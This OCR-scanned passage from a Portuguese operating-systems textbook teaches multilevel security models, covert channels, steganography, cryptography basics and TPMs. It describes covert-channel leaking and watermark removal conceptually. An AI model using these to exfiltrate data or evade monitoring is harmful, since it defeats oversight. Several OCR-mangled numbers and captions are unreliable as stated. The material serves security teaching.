1. Propriedade de segurança simples: um proces- 
so executando no nível de segurança k pode ler 


somente objetos nesse nível ou mais baixo. Por 
exemplo, um general pode ler os documentos de 
um tenente, mas um tenente não pode ler os do- 
cumentos de um general. 

2. Propriedade +: um processo executando no nível 
de segurança k só pode escrever objetos nesse nível 
ou mais alto. Por exemplo, um tenente pode anexar 
uma mensagem na caixa de correio de um general 
dizendo tudo o que ele sabe, mas um general não 
pode anexar uma mensagem à caixa de correio de 
um tenente dizendo tudo o que ele sabe, pois o ge- 
neral pode ter visto documentos altamente secretos 
que não podem ser revelados a um tenente. 


Resumindo, processos podem ler abaixo e escrever 
acima, mas não o inverso. Se o sistema implementa 
rigorosamente essas duas propriedades, pode ser de- 
monstrado que nenhuma informação pode vazar de um 
nível de segurança mais alto para um mais baixo. A pro- 
priedade « foi assim chamada porque no texto original, 
os autores não conseguiram pensar em um nome bom 
para ela e usaram * como um nome temporário até que 
pudessem pensar em algo melhor. Isso nunca aconteceu 
e o texto foi impresso com o *. Nesse modelo, os pro- 
cessos leem e escrevem objetos, mas não se comunicam 
um com o outro diretamente. O modelo Bell-LaPadula 
é ilustrado graficamente na Figura 9.11. 

Nessa figura, uma seta (com linha contínua) de um 
objeto para um processo indica que o processo está len- 
do o objeto, isto é, informações estão fluindo de um ob- 
jeto para o processo. De modo similar, uma seta (com 
linha tracejada) de um processo para um objeto indica 
que o processo está escrevendo no objeto, isto é, infor- 
mações estão fluindo do processo para o objeto. Desse 


GED O modelo de segurança multinível Bell-LaPadula. 
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modo, todas as informações fluem na direção das setas. 
Por exemplo, o processo B pode ler do objeto 7, mas 
não do objeto 3. 

A propriedade de segurança simples diz que todas as 
setas de linha contínua (leitura) vão para o lado ou para 
cima. A propriedade + diz que todas as setas tracejadas (es- 
crita) também vão para o lado ou para cima. Tendo em vis- 
ta que a informação flui somente horizontalmente ou para 
cima, qualquer informação que começa no nível k jamais 
pode aparecer em um nível mais baixo. Em outras pala- 
vras, jamais existe um caminho que mova a informação 
para baixo, garantindo desse modo a segurança do modelo. 

O modelo Bell-LaPadula refere-se à estrutura orga- 
nizacional, mas em última análise ele tem de ser im- 
plementado pelo sistema operacional. Uma maneira de 
se fazer isso é designando a cada usuário um nível de 
segurança, a ser armazenado juntamente com outros 
dados específicos do usuário como o UID e GID. Ao 
realizar o login, o shell do usuário adquiriria o nível 
de segurança dele e isso seria herdado por todos os 
seus filhos. Se um processo executando em um nível 
de segurança k tentasse abrir um arquivo ou outro ob- 
jeto cujo nivel de segurança é maior do que k, o siste- 
ma operacional deveria rejeitar a tentativa de abertura. 
De modo similar, tentativas de abrir qualquer objeto de 
um nível de segurança mais baixo do que k para escrita 
devem fracassar. 


Modelo Biba 


Para resumir o modelo Bell-LaPadula em termos mi- 
litares, um tenente pode pedir a um soldado para revelar 
tudo o que ele sabe e então copiar essa informação para 
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o arquivo de um general sem violar a segurança. Agora 
vamos colocar o mesmo modelo em termos civis. Ima- 
gine uma empresa na qual os faxineiros têm um nível 
de segurança 1, programadores, um nível de segurança 
3, e o presidente da empresa, um nível de segurança 5. 
Usando Bell-LaPadula, um programador pode inquirir 
um faxineiro a respeito dos planos futuros de uma em- 
presa e então reescrever os arquivos do presidente que 
contêm estratégia corporativa. Nem todas as empre- 
sas ficarão igualmente entusiasmadas a respeito desse 
modelo. 

O problema com o modelo Bell-LaPadula é que ele 
foi projetado para manter segredos, não garantir a inte- 
gridade dos dados. Para isso, necessitamos precisamente 
das propriedades inversas (BIBA, 1977): 


1. Propriedade de integridade simples: um pro- 
cesso executando no nível de segurança k pode 
escrever apenas objetos nesse nível ou mais bai- 
xo (não acima). 

2. Propriedade de integridade +: um processo exe- 
cutando no nível de segurança k pode ler somente 
objetos nesse nível ou mais alto (não abaixo). 


Juntas, essas propriedades asseguram que o progra- 
mador possa atualizar os arquivos do faxineiro com 
informações adquiridas do presidente, mas não o con- 
trário. É claro, algumas organizações querem ambas as 
propriedades, Bell-LaPadula e Biba, mas elas estão em 
conflito direto, de maneira que são difíceis de imple- 
mentar simultaneamente. 


9.4.2 Canais ocultos 


Todas essas ideias de modelos formais e sistemas 
provavelmente seguros soam ótimas, mas será que fun- 
cionam realmente? Em uma palavra: não. Mesmo em 
um sistema com um modelo de segurança apropria- 
do subjacente a ele e que se provou ser seguro e está 


corretamente implementado, vazamentos de segurança 
ainda assim podem ocorrer. Nesta seção, discutimos 
como as informações ainda podem vazar mesmo quan- 
do foi rigorosamente provado que tal vazamento é ma- 
tematicamente impossível. Essas ideias são devidas a 
Lampson (1973). 

O modelo de Lampson foi originalmente formula- 
do em termos de um único sistema de tempo compar- 
tilhado, mas as mesmas ideias podem ser adaptadas 
para LANs e outros ambientes com múltiplos usuários, 
incluindo aplicações executando na nuvem. Na forma 
mais pura, ele envolve três processos na mesma má- 
quina protegida. O primeiro processo, o cliente, quer 
algum trabalho desempenhado pelo segundo, o servi- 
dor. O cliente e o servidor não confiam inteiramente 
um no outro. Por exemplo, o trabalho do servidor é 
ajudar os clientes a preencher formulários de impos- 
tos. Os clientes estão preocupados que o servidor vá 
registrar secretamente seus dados financeiros, por 
exemplo, mantendo uma lista secreta de quem ganha 
quanto, e então vender a lista. O servidor está preocu- 
pado que os clientes tentarão roubar o valioso progra- 
ma de impostos. 

O terceiro processo é o colaborador, que está cons- 
pirando com o servidor para realmente roubar os dados 
confidenciais do cliente. O colaborador e o servidor são 
tipicamente de propriedade da mesma pessoa. Esses três 
processos são mostrados na Figura 9.12. O objeto desse 
exercício é projetar um sistema no qual seja impossível 
para o processo servidor vazar para o processo colabo- 
rador a informação que ele recebeu legitimamente do 
processo cliente. Lampson chamou isso de problema 
do confinamento. 

Do ponto de vista do projetista do sistema, a meta é 
encapsular ou confinar o servidor de tal maneira que ele 
não possa passar informações para o colaborador. Usan- 
do um esquema de matriz de proteção conseguimos fa- 
cilmente garantir que o servidor não possa se comunicar 


GEG (a) Os processos cliente, servidor e colaborador. (b) O servidor encapsulado ainda pode vazar para o colaborador por 
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com o colaborador escrevendo um arquivo para o qual 
o colaborador tenha acesso de leitura. Podemos tam- 
bém provavelmente assegurar que o servidor não possa 
se comunicar com o colaborador usando o mecanismo 
de comunicação entre processos do sistema. 

Infelizmente, talvez também haja a disponibilidade 
de canais de comunicação mais sutis. Por exemplo, o 
servidor pode tentar comunicar um fluxo de bits bi- 
nário como a seguir. Para enviar um bit 1, ele calcula 
de maneira intensiva por um intervalo de tempo fixo. 
Para enviar um bit 0, ele vai dormir pelo mesmo inter- 
valo de tempo. 

O colaborador pode tentar detectar o fluxo de bits 
monitorando cuidadosamente o seu tempo de resposta. 
Em geral, ele receberá uma resposta melhor quando o 
servidor estiver enviando um 0 do que quando o servi- 
dor estiver enviando um 1. Esse canal de comunicação 
é conhecido como um canal oculto, e é ilustrado na Fi- 
gura 9.12(b). 

É claro, o canal oculto é um canal ruidoso, contendo 
muitas informações estranhas a ele, mas as informações 
podem ser enviadas confiavelmente através do canal 
ruidoso usando um código de correção de erros (por 
exemplo, um código Hamming, ou mesmo algo mais 
sofisticado). O uso de um código de correção de erros 
reduz a largura de banda já baixa do canal oculto ainda 
mais, mas isso já pode ser o suficiente para vazar in- 
formações substanciais. Está bastante claro que nenhum 
modelo de proteção baseado em uma matriz de objetos 
e domínios vá evitar esse tipo de vazamento. 

A modulação do uso da CPU não é o único canal 
oculto. A taxa de paginação também pode ser modula- 
da (muitas faltas de páginas para um 1, nenhuma fal- 
ta de página para um 0). Na realidade, quase qualquer 
maneira de degradar o desempenho do sistema de uma 
maneira sincronizada é uma candidata. Se o sistema 
fornece uma maneira de travar os arquivos, então o 
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servidor pode travar algum arquivo para indicar um 1, e 
destravá-lo para indicar um 0. Em alguns sistemas, pode 
ser possível para um processo detectar o status de uma 
trava mesmo em um arquivo que ele não possa aces- 
sar. Esse canal oculto é ilustrado na Figura 9.13, com o 
arquivo travado ou destravado por algum intervalo de 
tempo fixo conhecido tanto para o servidor quanto para 
o colaborador. Nesse exemplo, o fluxo de bits secreto 
11010100 está sendo transmitido. 

Travar e destravar um arquivo prearranjado, S, não 
é um canal especialmente ruidoso, mas ele exige um 
timing um pouco mais preciso, a não ser que a taxa de 
bits seja muito baixa. A confiabilidade e o desempenho 
podem ser aumentados ainda mais usando um protocolo 
reconhecido. Esse protocolo usa mais dois arquivos, F'/ 
e F2, travados pelo servidor e pelo colaborador, respec- 
tivamente, para manter os dois processos sincronizados. 
Após o servidor travar ou destravar S, ele vira o status 
da trava de F7 para indicar que um bit foi enviado. Tão 
logo o colaborador tiver lido o bit, ele vira o status da 
trava F2 para dizer ao servidor que ele está pronto para 
outro bit e espera até que FZ seja virado de novo para 
indicar que outro bit está presente em S. Tendo em vista 
que o timing não está mais envolvido, esse protocolo é 
completamente confiável, mesmo em um sistema ocu- 
pado, e pode executar tão rápido quanto dois processos 
podem ser escalonados. Para conseguir uma largura de 
banda mais alta, por que não usar dois arquivos por tem- 
po de bit, ou fazer um canal de um byte de largura com 
oito arquivos de sinalização, SO até $7? 

A aquisição e liberação de recursos dedicados (uni- 
dades de fita, plotter etc.) também podem ser usadas 
para sinalização. O servidor adquire o recurso para 
enviar um | e o libera para enviar um 0. Em UNIX, 
o servidor pode criar um arquivo para indicar um 1 e 
removê-lo para indicar um 0; o colaborador pode usar a 
chamada de sistema access para ver se o arquivo existe. 
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Essa chamada funciona apesar de o colaborador não ter 
permissão para usar o arquivo. Infelizmente, existem 
muitos outros canais ocultos. 

Lampson também mencionou uma maneira de vazar 
informações para o proprietário (humano) do processo 
servidor. Presumivelmente, o processo servidor deve ter 
o direito de dizer ao seu proprietário quanto trabalho ele 
fez em prol do cliente, de maneira que o cliente possa 
ser cobrado. Se a conta de computação real for, diga- 
mos, US$ 100 e a renda do cliente for US$ 53.000, o 
servidor poderia mostrar uma conta de US$ 100,53 para 
o seu proprietário. 

Apenas encontrar todos os canais ocultos, e mais 
ainda bloqueá-los, é algo extremamente difícil. Na prá- 
tica, há pouco que possa ser feito. Introduzir um proces- 
so que provoca faltas de páginas aleatoriamente ou, de 
outra maneira, passar o seu tempo degradando o desem- 
penho do sistema a fim de reduzir a largura de banda 
dos canais ocultos não é uma ideia atraente. 


Esteganografia 


Um tipo ligeiramente diferente de canal oculto pode 
ser usado para passar informações secretas entre proces- 
sos, mesmo com um censor humano ou automatizado 
inspecionando todas as mensagens entre os processos 
e vetando as suspeitas. Por exemplo, considere uma 
empresa que verifique manualmente todos os e-mails 
enviados pelos empregados da empresa para certificar- 
-se de que eles não estejam vazando segredos para cúm- 
plices ou competidores fora da empresa. Há como um 
empregado contrabandear volumes substanciais de in- 
formações confidenciais bem debaixo do nariz do cen- 
sor? Na realidade a resposta é sim, e não chega a ser 
algo tão difícil. 


Como exemplo, considere a Figura 9.14(a). Essa fo- 
tografia, tirada pelo autor no Quênia, contém três zebras 
contemplando uma acácia. A Figura 9.14(b) parece ser 
as mesmas três zebras e uma acácia, mas com uma atra- 
ção a mais. Ela contém o texto completo, sem cortes, 
de cinco peças de Shakespeare embutidas nela: Hamlet, 
Rei Lear Macbeth, O Mercador de Veneza e Júlio César. 
Juntas, essas peças totalizam 700 KB de texto. 

Como esse canal oculto funciona? A imagem origi- 
nal colorida tem 1024 x 768 pixels. Cada pixel consiste 
em três números de 8 bits, um para cada intensidade 
de vermelho, verde e azul daquele pixel. A cor do pi- 
xel é formada pela sobreposição linear das três cores. 
O método de codificação usa o bit de baixa ordem de 
cada valor de cor RGB como um canal oculto. Desse 
modo, cada pixel tem espaço para 3 bits de informações 
secretas, um no valor vermelho, um no valor verde e 
um no valor azul. Com uma imagem desse tamanho, 
até 1024 x 768 x 3 bits (294.912 bytes) de informações 
secretas podem ser armazenadas nela. 

O texto completo das cinco peças e uma nota cur- 
ta somam 734.891 bytes. Isso foi primeiro comprimido 
para em torno de 274 KB usando um algoritmo de com- 
pressão padrão. A saída comprimida foi então cripto- 
grafada e inserida nos bits de baixa ordem de cada valor 
de cor. Como pode ser visto (ou na realidade, não pode 
ser visto), a existência da informação é completamente 
invisível. Ela é igualmente invisível na versão colorida 
ampliada da foto. O olho não consegue distinguir facil- 
mente uma cor de 7 bits de outra de 8 bits. Assim que 
o arquivo de imagem tiver passado pelo censurador, o 
receptor apenas separa todos os bits de baixa ordem, 
aplica os algoritmos de decriptação e descompressão, 
e recupera os 734.891 bytes originais. Esconder a exis- 
tência de informações como essa é chamado de estega- 
nografia (das palavras gregas para “escrita oculta”). A 


le TEAET (a) Três zebras e uma árvore. (b) Três zebras, uma árvore e o texto completo de cinco peças de William Shakespeare. 








esteganografia não é popular em ditaduras que tentam 
restringir a comunicação entre seus cidadãos, mas é 
popular com as pessoas que acreditam firmemente na 
liberdade de expressão. 

Ver as duas imagens em preto e branco com uma 
baixa resolução não faz justiça a quão poderosa é essa 
técnica. Para ter uma ideia melhor de como a estegano- 
grafia funciona, um dos autores (AST) preparou uma 
demonstração para os sistemas Windows, incluindo a 
imagem totalmente em cores da Figura 9.14(b) com cin- 
co peças embutidas nela. A demonstração pode ser en- 
contrada na URL <www.cs.vu.nl/~ast/>. Clique no link 
(covered writing) sob o título STEGANOGRAPHY 
DEMO. Então siga as instruções naquela página para 
baixar a imagem e as ferramentas de esteganografia 
necessárias para extrair as peças. É difícil de acreditar 
nisso, mas faça uma tentativa: é ver para crer. 

Outro uso da esteganografia é para a inserção de 
marcas d'água em imagens usadas nas páginas da web 
para detectar seu roubo e reutilização em outras páginas 
da web. Se a sua página da web contém uma imagem 
com a mensagem secreta “Copyright 2014, General 
Images Corporation” você terá a maior dificuldade em 
convencer um juiz de que foi você mesmo que produziu 
a imagem. Música, filmes e outros tipos de materiais 
também podem ser identificados com marcas d'água 
dessa maneira. 

É claro, o fato de que marcas d'água são usadas des- 
sa maneira encoraja algumas pessoas a procurar por 
maneiras de removê-las. Um esquema que armazena 
informações nos bits de baixa ordem de cada pixel pode 
ser derrotado girando a imagem 1 grau no sentido ho- 
rário, então convertendo-a para um sistema com perdas 
com JPEG e, em seguida, girando-a de volta em 1 grau. 
Por fim, a imagem pode ser reconvertida para o sistema 
de codificação original (por exemplo, gif, bmp, tif). A 
conversão com perdas JPEG embaralhara os bits de bai- 
xa ordem e as rotações envolvem enormes cálculos de 
ponto flutuante, o que introduz erros de arredondamen- 
to, também acrescentando ruído aos bits de baixa or- 
dem. As pessoas que colocam as marcas d'água sabem 
disso (ou deveriam sabê-lo), então elas colocam suas 
informações de direitos autorais de maneira redundante 
e usam esquemas além de apenas bits de baixa ordem 
dos pixels. Por sua vez, isso estimula os atacantes a pro- 
curar por técnicas de remoção melhores. E assim vai. 

A esteganografia pode ser usada para vazar infor- 
mações de uma maneira oculta, mas é mais comum que 
queiramos fazer o oposto: esconder a informação dos 
olhos intrometidos de atacantes, sem necessariamente es- 
conder o fato de que a estejamos escondendo. Da mesma 
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forma que Júlio César, queremos assegurar que mesmo 
que nossas mensagens ou arquivos caiam nas mãos erra- 
das, o inimigo não será capaz de detectar a informação 
secreta. Esse é o domínio da criptografia e o tópico da 
assunto seção. 


9.5 Noções básicas de criptografia 


A criptografia tem um papel importante na segurança. 
Muitas pessoas estão familiarizadas com criptogramas 
de computadores, que são pequenos quebra-cabeças nos 
quais cada letra foi sistematicamente substituída por uma 
diferente. Eles estão tão próximos da criptografia moder- 
na quanto cachorros-quentes estão da alta cozinha. Nesta 
seção daremos uma visão geral da criptografia na era dos 
computadores. Como mencionado, os sistemas operacio- 
nais usam a criptografia em muitos lugares. Por exemplo, 
alguns sistemas de arquivos podem criptografar todos os 
dados no disco, protocolos como IPSec podem criptogra- 
far e/ou assinalar todos os pacotes de rede, e a maioria 
dos sistemas operacionais embaralha as senhas para evitar 
que os atacantes as recuperem. Além disso, na Seção 9.6, 
discutiremos o papel da criptografia em outro aspecto im- 
portante da segurança: autenticação. 

Examinaremos as primitivas básicas usadas por es- 
ses sistemas. No entanto, uma discussão séria a respeito 
da criptografia está além do escopo deste livro. Mui- 
tos livros excelentes sobre segurança de computadores 
discutem extensamente esse tópico. O leitor interessa- 
do pode procurá-los (por exemplo, KAUFMAN et al. 
2002; e GOLLMAN, 2011). A seguir apresentaremos 
uma discussão bem rápida sobre criptografia para os 
leitores completamente não familiarizados com ela. 

A finalidade da criptografia é pegar uma mensagem 
ou arquivo, chamada de texto puro (plaintext) em texto 
cifrado (ciphertext) de tal maneira que apenas pesso- 
as autorizadas sabem como convertê-lo de volta para o 
texto puro. Para todas as outras, o texto cifrado é apenas 
uma pilha incompreensível de bits. Por mais estranho 
que isso possa soar para iniciantes na área, os algorit- 
mos (funções) de codificação e decodificação sempre 
devem ser tornados públicos. Tentar mantê-los em se- 
gredo quase nunca funciona e proporciona às pessoas 
tentando manter os segredos uma falsa sensação de 
segurança. No segmento, essa tática é chamada de se- 
gurança por obscuridade e é empregada somente por 
amadores em segurança. De maneira surpreendente, a 
categoria de amadores também inclui muitas corpora- 
ções multinacionais enormes que realmente deveriam 
saber melhor. 


430) | SISTEMAS OPERACIONAIS MODERNOS 


Em vez disso, o segredo depende dos parâmetros 
para os algoritmos chamados chaves. Se P é o arqui- 
vo de texto puro, K, é a chave de criptografia, C é o 
texto cifrado e E é o algoritmo de codificação (isto é, 
a função), então C= E(P, K,). Essa é a definição da co- 
dificação. Ela diz que o texto cifrado é obtido usando o 
algoritmo de criptografia (conhecido), E, com o texto 
puro, P, e a chave de criptografia (secreta), K,, como 
parâmetros. A ideia de que todos os algoritmos devam 
ser públicos e o segredo deva residir exclusivamente 
nas chaves é chamada de princípio de Kerckhoffs, for- 
mulado pelo criptógrafo holandês do século XIX, Au- 
guste Kerckhoffs. Todos os criptógrafos sérios assinam 
embaixo dessa ideia. 

Similarmente, P = D(C, K,), em que D é o algorit- 
mo de codificação e K, é a chave de descodificação. 
Isso diz que para conseguir o texto puro, P, de volta do 
texto cifrado, C, e a chave de descodificação, K,, você 
executa o algoritmo D com Ce K, como parâmetros. A 
relação entre as várias partes é mostrada na Figura 9.15. 


9.5.1 Criptografia por chave secreta 


Para deixar isso mais claro, considere um algoritmo 
de codificação no qual cada letra é substituída por uma 
letra diferente, por exemplo, todos os 4 são substituídos 
por Q, todos os B são substituídos por W, todos os C são 
substituídos por E, e assim por diante dessa maneira: 


texto puro: ABCDEFGHIJKLMNOPQR 
STUVWXYZ 

texto cifrado: QWERTYUIOPASDFGHJK 
LZXCVBNM 


Esse sistema geral é chamado de substituição 
monoalfabética, em que a chave é a cadeia de ca- 
racteres de 26 letras correspondendo ao alfabeto 
completo. A chave de decriptação nesse exemplo é 


[FIGURA 9.15] Relacionamento entre o texto puro e o texto cifrado. 


Chave criptográfica 





OWERTYUIOPASDFGHJKLZXCVBNM. Para a cha- 
ve dada, o texto puro ATTACK seria transformado 
no texto cifrado QZZQEA. A chave de decriptação 
diz como voltar do texto cifrado para o texto puro. 
Nesse exemplo, a chave de decriptação é KXVMC- 
NOPHORSZYIJADLEGWBUFT, pois um A no texto 
cifrado é um K no texto puro, um B no texto cifrado é 
um X no texto puro etc. 

À primeira vista, isso poderia parecer um sistema se- 
guro, pois embora o analista de criptografia conheça o 
sistema geral (substituição letra por letra), ele não sabe 
quais das 26! = 4 x 10% chaves possíveis está sendo 
usada. Mesmo assim, dado um montante surpreenden- 
temente pequeno de texto cifrado, o código pode ser fa- 
cilmente quebrado. O ataque básico tira vantagem das 
propriedades estatísticas das línguas naturais. Em inglês, 
por exemplo, e é a letra mais comum, seguida por ¢, o, 
a, n, i etc. As combinações de duas letras mais comuns, 
chamadas diagramas, são th, in, er, re e assim por diante. 
Usando esse tipo de informação, quebrar o código é fácil. 

A maioria dos sistemas criptográficos, como esse, 
tem a propriedade de que, fornecida a chave criptográfi- 
ca, é fácil de encontrar a chave de decriptação. Tais sis- 
temas são chamados de criptografia de chave secreta 
ou criptografia de chave simétrica. Embora os códigos 
de substituição monoalfabética não tenham valor algum, 
outros algoritmos de chave simétrica são conhecidos e 
relativamente seguros se as chaves forem suficientemen- 
te longas. Para uma segurança séria, devem ser usadas 
chaves de no mínimo 256 bits, dado um espaço de busca 
de 22% = 1,2 x 107 chaves. Chaves mais curtas podem 
demover amadores, mas não os principais governos. 


9.5.2 Criptografia de chave pública 


Os sistemas de chave secreta são eficientes porque a 
quantidade de computação exigida para criptografar ou 
decriptar uma mensagem é gerenciável, mas eles têm 
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uma grande desvantagem: o emissor e o receptor de- 
vem ter em mãos a chave secreta compartilhada. Eles 
podem até ter de encontrar-se fisicamente para que um 
a dê para o outro. Para contornar esse problema, a crip- 
tografia de chave pública é usada (DIFFIE e HELL- 
MAN, 1976). Esse sistema tem a propriedade que 
chaves distintas são usadas para criptografia e decripta- 
ção e que, fornecida uma chave criptográfica bem esco- 
lhida, é virtualmente impossível descobrir-se a chave de 
decriptação correspondente. Sob essas circunstâncias, a 
chave de encriptação pode ser tornada pública e apenas 
a chave de decriptação mantida em segredo. 

Apenas para dar uma noção da criptografia de chave 
pública, considere as duas questões a seguir: 


quanto é 314159265358979 x 
314159265358979? 

Questão 2: Qual é a raiz quadrada de 3912571506 
419387090594828508241? 


Questão 1: 


A maioria dos alunos da sexta série, se receberem um 
lápis, papel e a promessa de um sundae realmente grande 
pela resposta correta, poderia responder à questão 1 em 
uma hora ou duas. A maioria dos adultos, se recebessem 
um lápis, papel e a promessa de um abatimento vitalício 
de 50% em seu imposto de renda, não conseguiria solu- 
cionar a questão 2 de jeito nenhum sem usar uma calcu- 
ladora, computador ou outra ajuda externa. Embora as 
operações de elevar ao quadrado e extrair a raiz quadrada 
sejam inversas, elas diferem enormemente em sua com- 
plexidade computacional. Esse tipo de assimetria forma 
a base da criptografia de chave pública. A encriptação faz 
uso da operação fácil, mas a decriptação sem a chave exi- 
ge que você realize a operação difícil. 

Um sistema de chave pública chamado RSA explo- 
ra o fato de que a multiplicação de números realmente 
grandes é muito mais fácil para um computador do que 
a fatoração de números realmente grandes, em especial 
quando toda a aritmética é feita usando a aritmética de 
módulo e todos os números envolvidos têm centenas de 
dígitos (RIVEST et al., 1978). Esse sistema é ampla- 
mente usado no mundo criptográfico. Sistemas base- 
ados em logaritmos discretos também são usados (EL 
GAMAL, 1985). O principal problema com a criptogra- 
fia de chave pública é que ela é mil vezes mais lenta do 
que a criptografia simétrica. 

A maneira como a criptografia de chave pública fun- 
ciona é que todos escolhem um par (chave pública, cha- 
ve privada) e publicam a chave pública. A chave pública 
é de encriptação; a chave privada é a de decriptação. Em 
geral, a criação da chave é automatizada, possivelmente 
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com uma senha selecionada pelo usuario fornecida ao 
algoritmo como uma semente. Para enviar uma mensa- 
gem secreta a um usuario, um correspondente encripta 
a mensagem com a chave pública do receptor. Como so- 
mente o receptor tem a chave privada, apenas ele pode 
decriptar a mensagem. 


9.5.3 Funções de mão única 


Em várias situações que veremos mais tarde é dese- 
javel ter alguma função, f, que tem a propriedade que 
dado f e seu parâmetro x, calcular y = f(x) é algo fácil 
de fazer, mas dado somente f(x), encontrar x é compu- 
tacionalmente impossível. Esse tipo de função costuma 
embaralhar os bits de maneiras complexas. Ela pode co- 
meçar inicializando y para x. Então ela poderia ter um 
laço para iterar tantas vezes quantas ha bits 1 em x, com 
cada iteração permutando os bits de y de uma manei- 
ra dependente da iteração, adicionando uma constante 
diferente em cada iteração, e em geral misturando os 
bits muito bem. Essa função é chamada de função de 
resumo (hash) criptográfico. 


9.5.4 Assinaturas digitais 


Com frequência é necessário assinar um documento di- 
gitalmente. Por exemplo, suponha que um cliente instrua 
o banco a comprar algumas ações para ele enviando ao 
banco uma mensagem de e-mail. Uma hora após o pedido 
ter sido enviado e executado, a ação despenca. O cliente 
agora nega ter enviado algum dia o e-mail. O banco pode 
apresentar o e-mail, é claro, mas o cliente pode alegar que 
o banco o forjou a fim de ganhar uma comissão. Como 
um juiz vai saber quem está dizendo a verdade? 

Assinaturas digitais tornam possível assinar e-mails 
e outros documentos digitais de tal maneira que eles não 
possam ser repudiados pelo emissor mais tarde. Uma 
maneira comum é primeiro executar o documento atra- 
vés de um algoritmo de resumo criptográfico de senti- 
do único que seja muito difícil de inverter. A função de 
resumo normalmente produz um resultado de compri- 
mento fixo não importa qual seja o tamanho do docu- 
mento original. As funções de resumo mais populares 
usadas são o SHA-1 (Secure Hash Algorithm — Al- 
goritmo de resumo seguro), que produz um resultado de 
20 bytes (NIST, 1995). Versões mais novas do SHA-1 
são o SHA-256 e o SHA-512, que produzem resultados 
de 32 e 64 bytes, respectivamente, mas têm sido menos 
usados até o momento. 
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O passo a seguir presume o uso da criptografia de 
chave pública como descrito. O proprietário do docu- 
mento então aplica sua chave privada ao resumo para 
obter D(resumo). Esse valor, chamado de assinatura de 
bloco, é anexado ao documento e enviado ao receptor, 
como mostrado na Figura 9.16. A aplicação de D ao re- 
sumo é às vezes referida como a decriptação do resumo, 
mas não se trata realmente de uma decriptação, pois ele 
não foi criptografado. Trata-se apenas de uma transfor- 
mação matemática do resumo. 

Quando o documento e o resumo chegam, o recep- 
tor primeiro calcula o resumo do documento usando 
SHA-1 ou qualquer que tenha sido a função de resumo 
criptográfica acordada antes. O receptor então aplica a 
chave pública do emissor ao bloco de assinatura para 
obter E(D(resumo)). Na realidade, ele “encripta” o re- 
sumo decriptado, cancelando-o e recebendo o resumo 
de volta. Se o resumo calculado não casar com o resu- 
mo do bloco de assinatura, o documento, o bloco de 
assinatura, ou ambos, foram alterados (ou modificados 
por acidente). O valor desse esquema é que ele aplica a 
criptografia de chave pública (lenta) apenas a uma par- 
te relativamente pequena de dados, o resumo. Observe 
cuidadosamente que esse método funciona somente se 
para todo x. 


E(D (x) =x 


Não é garantido por antecipação que todas as fun- 
ções criptográficas terão essa propriedade, já que tudo o 
que pedimos originalmente foi que 


D (E (x)) =x 


isto é, E é a função criptográfica e D é a função de de- 
criptação. Para adicionar a propriedade da assinatura, a 
ordem de aplicação não deve importar, isto é, D e E de- 
vem ser funções comutativas. Felizmente, o algoritmo 
RSA tem a sua propriedade. 

Para usar esse esquema de assinatura, o receptor deve 
conhecer a chave pública do emissor. Alguns usuários 


publicam sua chave pública em sua página da web. Ou- 
tros não o fazem porque eles temem que um intruso viole 
o seu sistema e altere secretamente sua chave. Para eles, 
um mecanismo alternativo é necessário para distribuir 
chaves públicas. Um método comum é para os emisso- 
res de mensagens anexarem um certificado à mensagem, 
que contém o nome do usuário e a chave pública e é digi- 
talmente assinado por um terceiro de confiança. Uma vez 
que o usuário tenha adquirido a chave pública do tercei- 
ro de confiança, ele pode aceitar certificados de todos os 
emissores que usam seu terceiro de confiança para gerar 
seus certificados. 

Um terceiro de confiança que assina certificados é 
chamado de CA (Certification Authority — Autorida- 
de de certificação). No entanto, para um usuário verificar 
um certificado assinado por uma CA, ele precisa da cha- 
ve pública da CA. De onde isso vem e como o usuário 
sabe que ela é a chave real? Fazer isso exige de maneira 
geral todo um esquema para gerenciar chaves públicas, 
chamado de PKI (Public Key Infrastructure — Infra- 
estrutura de chave pública). Para navegadores da web, 
o problema é solucionado de uma maneira improvisada: 
todos os navegadores vêm pré-carregados com as chaves 
públicas de aproximadamente 40 CAs populares. 

Já descrevemos como a criptografia de chave pública 
pode ser usada para assinaturas digitais. Também vale a 
pena mencionar que também existem os esquemas que 
não envolvem a criptografia de chave pública. 


9.5.5 Módulos de plataforma confiável 


Toda criptografia exige chaves. Se as chaves são 
comprometidas, toda a segurança baseada nelas tam- 
bém é comprometida. Armazenar as chaves de maneira 
segura é, portanto, essencial. Como armazenar chaves 
de maneira segura em um sistema que não é seguro”? 

Uma proposta que a indústria apresentou é um chip 
chamado de TPM (Trusted Platform Module — 
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Módulo de Plataforma Confiável), que é um criptopro- 
cessador com alguma capacidade de armazenamento 
não volátil dentro dele para chaves. O TPM pode rea- 
lizar operações criptográficas como encriptar blocos de 
texto puro ou a decriptação de blocos de texto cifrado 
na memória principal. Ele também pode verificar assi- 
naturas digitais. Quando todas essas operações estive- 
rem feitas em hardwares especializados, elas se tornam 
muito mais rápidas e sua chance de serem mais usadas 
aumenta. Muitos computadores já têm chips TPM e 
muitos mais provavelmente os terão no futuro. 

O TPM é extremamente controverso porque diferen- 
tes partes têm diferentes ideias a respeito de quem vai 
controlar o TPM e do que ele vai proteger de quem. A 
Microsoft tem sido uma grande defensora desse concei- 
to e desenvolveu uma série de tecnologias para usá-lo, 
incluindo Palladium, NGSCB e BitLocker. Do ponto 
de vista da empresa, o sistema operacional controla o 
TPM e o usa, por exemplo, para encriptar o disco ri- 
gido. No entanto, ele também quer usar o TPM para 
evitar que softwares não autorizados sejam executados. 
“Softwares não autorizados” podem ser softwares pira- 
teados (isto é, ilegalmente copiados) ou apenas um soft- 
ware que o sistema operacional não autoriza. Se o TPM 
estiver envolvido no processo de inicialização, ele pode 
inicializar somente os sistemas operacionais sinalizados 
por uma chave secreta colocada dentro do TPM pelo fa- 
bricante e revelada apenas para vendedores do sistema 
operacional selecionado (por exemplo, Microsoft). As- 
sim, o TPM poderia ser usado para limitar as escolhas 
de usuários do software para aqueles aprovados pelo 
fabricante do computador. 

As indústrias da música e do cinema também se in- 
teressam muito pelo TPM na medida em que ele po- 
deria ser usado para evitar a pirataria de seu conteúdo. 
Ele também poderia abrir novos modelos de negócios, 
como o aluguel de músicas e filmes por um período es- 
pecífico ao recusar-se a fazer a decriptação deles após o 
fim de seu prazo. 

Um uso interessante para TPMs é conhecido como 
atestação remota. A atestação remota permite que um 
terceiro verifique que o computador com TPM execute 
o software que ele deveria estar executando, e não algo 
que não pode ser confiado. A ideia é que a parte que 
atesta use o TPM para criar “medidas” que consistem 
em resumos criptográficos da configuração. Por exem- 
plo, vamos presumir que o terceiro não confie em nada 
em nossa máquina, exceto o BIOS. Se o terceiro investi- 
gando (externo) fosse capaz de verificar que estávamos 
